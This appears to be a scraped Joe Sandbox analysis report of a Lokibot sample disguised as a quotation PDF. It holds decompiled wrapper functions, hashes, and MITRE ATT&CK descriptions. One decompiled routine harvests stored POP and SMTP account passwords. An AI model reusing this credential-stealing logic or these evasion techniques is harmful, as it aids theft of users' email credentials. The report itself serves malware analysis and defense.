			E00403B64(WCHAR* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 2, 0xdc0853e1, 0, 0);
				_t3 = PathFileExistsW(_a4); // executed
				return _t3;
			}

0x00403b72
0x00403b7a
0x00403b7d

APIs

PathFileExistsW.KERNELBASE(?,00000002,DC0853E1,00000000,00000000), ref: 00403B7A

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: ExistsFilePath
String ID:
API String ID: 1174141254-0
Opcode ID: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction ID: 8bd75bc93bbce64143a6918826fd0663652f5dbe7ab318808702af7ec0dd126f
Opcode Fuzzy Hash: 79b415000e3dec3248a6d2155c6771fe406342b29d1d2faf8e1af97ba013cdd8
Instruction Fuzzy Hash: F4C0923028830C3BF9113AD2DC47F197E8D8B41B99F104025B70C3C4D2D9E3A6100199

Uniqueness

Uniqueness Score: -1.00%

Function 00404DE5, Relevance: 1.5, APIs: 1, Instructions: 6COMMON

Download Yara Rule

APIs

closesocket.WS2_32(00404EB0), ref: 00404DEB

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: closesocket
String ID:
API String ID: 2781271927-0
Opcode ID: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction ID: a7719220e23c04317d26723f710bfa070304820e6d91f105ed764937a1a9d613
Opcode Fuzzy Hash: 887654383893d56b64fc04469bc98b787ac4c367861e76a9ad562a01a17cc3aa
Instruction Fuzzy Hash: F4A0113000020CEBCB002B82EE088C83F2CEA882A0B808020F80C00020CB22A8208AC8

Uniqueness

Uniqueness Score: -1.00%

Function 00403F9E, Relevance: 1.3, APIs: 1, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403F9E(void* _a4) {
				int _t3;
				void* _t4;

				E004031E5(_t4, 0, 0xf53ecacb, 0, 0);
				_t3 = VirtualFree(_a4, 0, 0x8000); // executed
				return _t3;
			}

0x00403fac
0x00403fba
0x00403fbe

APIs

VirtualFree.KERNELBASE(0041028C,00000000,00008000,00000000,F53ECACB,00000000,00000000,00000000,?,0041028C,00000000), ref: 00403FBA

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction ID: 31a36aa897feec3f2575a3818ba469950b8b51fe97d839facc05156de448dee4
Opcode Fuzzy Hash: 4437192c676a59da206b473fb72d9d26ef1781d862ceba0a26f5730449a5d479
Instruction Fuzzy Hash: 9CC08C3200613C32893069DBAC0AFCB7E0CDF036F4B104021F50C6404049235A0186F8

Uniqueness

Uniqueness Score: -1.00%

Function 00406472, Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00406472(long _a4) {
				void* _t3;
				void* _t4;

				_t3 = E004031E5(_t4, 0, 0xcfa329ad, 0, 0);
				Sleep(_a4); // executed
				return _t3;
			}

0x0040647f
0x00406487
0x0040648a

APIs

Sleep.KERNELBASE(?,00000000,CFA329AD,00000000,00000000), ref: 00406487

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction ID: 8d08050a97d9600d7c0dbf2a5018eca7d85037e123ae0040efa9f3f0a7dd9c36
Opcode Fuzzy Hash: 1807eaeb392d941871dd7f4dce37bd4a7f558bd6a955fa7349a6f4d515d7796f
Instruction Fuzzy Hash: FBB092B08082083EEA002AF1AD05C3B7A8DDA4020870088257C08E5011E93ADE1150B9

Uniqueness

Uniqueness Score: -1.00%

Function 004058EA, Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004058EA(char* _a4, char* _a8) {
				char* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xc5c16604, 0, 0);
				_t4 = StrStrA(_a4, _a8); // executed
				return _t4;
			}

0x004058f8
0x00405903
0x00405906

APIs

StrStrA.KERNELBASE(?,?,00000002,C5C16604,00000000,00000000), ref: 00405903

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction ID: d5512459148ba4630ff55d530b0b04b7b8071b1588054f6e556ec5c474e97d6d
Opcode Fuzzy Hash: 042642b6324743061f7cb6dcc4248db4a99ff7c1e794a59b5538058313c095a3
Instruction Fuzzy Hash: 82C04C3118520876EA112AD19C07F597E1D9B45B68F108425BA1C6C4D19AB3A6505559

Uniqueness

Uniqueness Score: -1.00%

Function 00405924, Relevance: 1.3, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405924(WCHAR* _a4, WCHAR* _a8) {
				WCHAR* _t4;
				void* _t5;

				E004031E5(_t5, 2, 0xd6865bd4, 0, 0);
				_t4 = StrStrW(_a4, _a8); // executed
				return _t4;
			}

0x00405932
0x0040593d
0x00405940

APIs

StrStrW.KERNELBASE(?,?,00000002,D6865BD4,00000000,00000000), ref: 0040593D

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction ID: 5151f40d070928696ad3a3dfeafe9e6e8178c5ee17630b0dfe73cc98556a196c
Opcode Fuzzy Hash: 4bee70add85649cbd4a2768cfe9b9dcd091b7df8922090f97a094487be0f2036
Instruction Fuzzy Hash: 8FC04C311842087AEA112FD2DC07F587E1D9B45B58F104015B61C2C5D1DAB3A6105659

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040D069, Relevance: 12.6, Strings: 10, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040D069(void* __ebx, void* __eflags, intOrPtr* _a4) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __edi;
				void* __esi;
				intOrPtr _t40;
				intOrPtr _t45;
				intOrPtr _t47;
				void* _t71;
				void* _t75;
				void* _t77;

				_t72 = _a4;
				_t71 = E00404BEE(__ebx,  *_a4, L"EmailAddress");
				_t81 = _t71;
				if(_t71 != 0) {
					_push(__ebx);
					_t67 = E00404BEE(__ebx,  *_t72, L"Technology");
					_v16 = E00404BEE(_t37,  *_t72, L"PopServer");
					_v40 = E00404BA7(_t81,  *_t72, L"PopPort");
					_t40 = E00404BEE(_t37,  *_t72, L"PopAccount");
					_v8 = _v8 & 0x00000000;
					_v20 = _t40;
					_v24 = E00404C4E(_t71,  *_t72, L"PopPassword",  &_v8);
					_v28 = E00404BEE(_t67,  *_t72, L"SmtpServer");
					_v44 = E00404BA7(_t81,  *_t72, L"SmtpPort");
					_t45 = E00404BEE(_t67,  *_t72, L"SmtpAccount");
					_v12 = _v12 & 0x00000000;
					_v32 = _t45;
					_t47 = E00404C4E(_t71,  *_t72, L"SmtpPassword",  &_v12);
					_t77 = _t75 + 0x50;
					_v36 = _t47;
					if(_v8 != 0 || _v12 != 0) {
						E00405872( *0x49f934, _t71, 1, 0);
						E00405872( *0x49f934, _t67, 1, 0);
						_t74 = _v16;
						E00405872( *0x49f934, _v16, 1, 0);
						E00405781( *0x49f934, _v40);
						E00405872( *0x49f934, _v20, 1, 0);
						_push(_v8);
						E00405762(_v16,  *0x49f934, _v24);
						E00405872( *0x49f934, _v28, 1, 0);
						E00405781( *0x49f934, _v44);
						E00405872( *0x49f934, _v32, 1, 0);
						_push(_v12);
						E00405762(_t74,  *0x49f934, _v36);
						_t77 = _t77 + 0x88;
					} else {
						_t74 = _v16;
					}
					E0040471C(_t71);
					E0040471C(_t67);
					E0040471C(_t74);
					E0040471C(_v20);
					E0040471C(_v24);
					E0040471C(_v28);
					E0040471C(_v32);
					E0040471C(_v36);
				}
				return 1;
			}

0x0040d070
0x0040d080
0x0040d084
0x0040d086
0x0040d08c
0x0040d0a0
0x0040d0ae
0x0040d0bd
0x0040d0c0
0x0040d0c5
0x0040d0c9
0x0040d0e3
0x0040d0f2
0x0040d101
0x0040d104
0x0040d109
0x0040d110
0x0040d11e
0x0040d123
0x0040d126
0x0040d12d
0x0040d145
0x0040d154
0x0040d15a
0x0040d166
0x0040d174
0x0040d186
0x0040d18e
0x0040d19a
0x0040d1ac
0x0040d1ba
0x0040d1cc
0x0040d1d1
0x0040d1dd
0x0040d1e2
0x0040d1e7
0x0040d1e7
0x0040d1e7
0x0040d1eb
0x0040d1f1
0x0040d1f7
0x0040d1ff
0x0040d207
0x0040d20f
0x0040d217
0x0040d21f
0x0040d227
0x0040d230

Strings

SmtpServer, xrefs: 0040D0DC
PopPort, xrefs: 0040D0A7
SmtpPort, xrefs: 0040D0EB
EmailAddress, xrefs: 0040D074
PopAccount, xrefs: 0040D0B6
PopPassword, xrefs: 0040D0D0
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
Technology, xrefs: 0040D08D
PopServer, xrefs: 0040D099

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Uniqueness

Uniqueness Score: -1.00%

Function 0040434D, Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 00000001.00000002.506748036.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.506832254.00000000004A0000.00000040.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_Cotizaci#U00f3npdf.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 36af1e644ba25a92da10ffd92c092694d7a96ee7919212810e1bb10a92bc3d30
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	API monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report Cotizaci#U00f3npdf.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Lokibot

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Spreading:

Networking:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

Private

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Rich Headers

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Snort IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Function 00403225, Relevance: 70.3, APIs: 23, Strings: 17, Instructions: 270
filestringcomCOMMON

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Function 00405D7C, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14
fileCOMMON

Function 00405DA3, Relevance: 4.5, APIs: 3, Instructions: 20
libraryloaderCOMMON

Function 004035E3, Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 213
stringregistrylibraryCOMMON

Function 00402C5B, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 203
memoryCOMMON

Function 00401734, Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147
stringtimeCOMMON

Function 00402F01, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109
fileCOMMON

Function 0040302C, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 108
fileCOMMON

Function 00401F51, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69
libraryloaderCOMMON

Function 004015B3, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55
COMMON

Function 0040578B, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 32
COMMON

Function 733210A0, Relevance: 6.1, APIs: 4, Instructions: 96
filememoryCOMMON

Function 004031F1, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20
COMMON

Function 00406481, Relevance: 5.2, APIs: 4, Instructions: 236
COMMON

Function 00406682, Relevance: 5.2, APIs: 4, Instructions: 208
COMMON

Function 00406398, Relevance: 5.2, APIs: 4, Instructions: 205
COMMON

Function 00405E9D, Relevance: 5.2, APIs: 4, Instructions: 198
COMMON

Function 004062EB, Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Function 00406409, Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Function 00406355, Relevance: 5.2, APIs: 4, Instructions: 168
COMMON

Function 00401389, Relevance: 3.0, APIs: 2, Instructions: 43
windowCOMMON

Function 0040575C, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Function 0040573D, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Function 004055A3, Relevance: 1.3, APIs: 1, Instructions: 10
COMMON

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre